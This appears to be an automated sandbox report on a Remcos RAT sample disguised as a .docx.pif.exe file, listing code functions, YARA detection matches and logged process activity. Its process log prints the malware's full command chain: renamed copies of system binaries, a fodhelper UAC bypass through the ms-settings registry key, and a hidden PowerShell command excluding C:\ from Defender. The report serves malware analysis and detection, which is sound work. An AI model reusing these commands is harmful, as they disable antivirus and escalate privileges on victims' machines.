Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BE0CC	31_2_045BE0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459F0FA	31_2_0459F0FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045D4159	31_2_045D4159
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B8168	31_2_045B8168
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045C61F0	31_2_045C61F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BE2FB	31_2_045BE2FB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045D332B	31_2_045D332B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A739D	31_2_045A739D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B7D33	31_2_045B7D33
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B5E5E	31_2_045B5E5E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A6E0E	31_2_045A6E0E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BDE9D	31_2_045BDE9D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04593FCA	31_2_04593FCA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B6FEA	31_2_045B6FEA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B78FE	31_2_045B78FE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B3946	31_2_045B3946
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045CD9C9	31_2_045CD9C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A7A46	31_2_045A7A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459DB62	31_2_0459DB62
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A7BAF	31_2_045A7BAF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06421082	31_2_06421082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0646E678	31_2_0646E678
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064486F5	31_2_064486F5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645941F	31_2_0645941F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064545F5	31_2_064545F5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064585AD	31_2_064585AD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645F207	31_2_0645F207
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0644804C	31_2_0644804C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06458195	31_2_06458195
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06474E08	31_2_06474E08
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06458E17	31_2_06458E17
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06466E9F	31_2_06466E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06473FDA	31_2_06473FDA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645EFAA	31_2_0645EFAA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06434C79	31_2_06434C79
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06457C99	31_2_06457C99
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645ED7B	31_2_0645ED7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0643FDA9	31_2_0643FDA9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06447ABD	31_2_06447ABD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645EB4C	31_2_0645EB4C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06456B0D	31_2_06456B0D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0644885E	31_2_0644885E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0643E811	31_2_0643E811
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064589E2	31_2_064589E2

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\drbdmeyP.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Found potential string decryption / allocating functions

Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: String function: 0040DEF0 appears 38 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF64B573448 appears 90 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF64B57081C appears 45 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF64B57498C appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 045B4E10 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 045B4770 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06455ABF appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0645541F appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04581E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06422B14 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04582093 appears 50 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 0298480C appears 865 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 02997CC8 appears 49 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 029844AC appears 69 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 02997E14 appears 45 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 029846A4 appears 242 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 02986650 appears 37 times
Source: C:\Users\Public\ger.exe	Code function: String function: 00007FF7E0A0D3D0 appears 56 times

Sample file is different than original file name gathered from version info

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Binary or memory string: OriginalFilename vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Uses 32bit PE files

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@53/21@51/1

Source: C:\Users\Public\alpha.exe

8_2_00007FF64B5632B0

Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A03F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,		24_2_00007FF7E0A03F5C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04597952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		31_2_04597952

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02987F62 GetDiskFreeSpaceA,

0_2_02987F62

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299A174 CreateToolhelp32Snapshot,

0_2_0299A174

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02996D58 CoCreateInstance,

0_2_02996D58

Source: C:\Users\Public\Libraries\drbdmeyP.pif

Code function: 3_2_004026B8 LoadResource,SizeofResource,FreeResource,

3_2_004026B8

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

31_2_0459AC78

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
Source: C:\Users\Public\xkn.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03

Source: C:\Users\Public\Libraries\drbdmeyP.pif

File created: C:\Users\user\AppData\Local\Temp\D2F6.tmp

Jump to behavior

Source: C:\Users\Public\Libraries\drbdmeyP.pif

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\taskkill.exe

Source: C:\Users\Public\Libraries\drbdmeyP.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	ReversingLabs: Detection: 44%
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Virustotal: Detection: 50%

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

File read: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe"
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
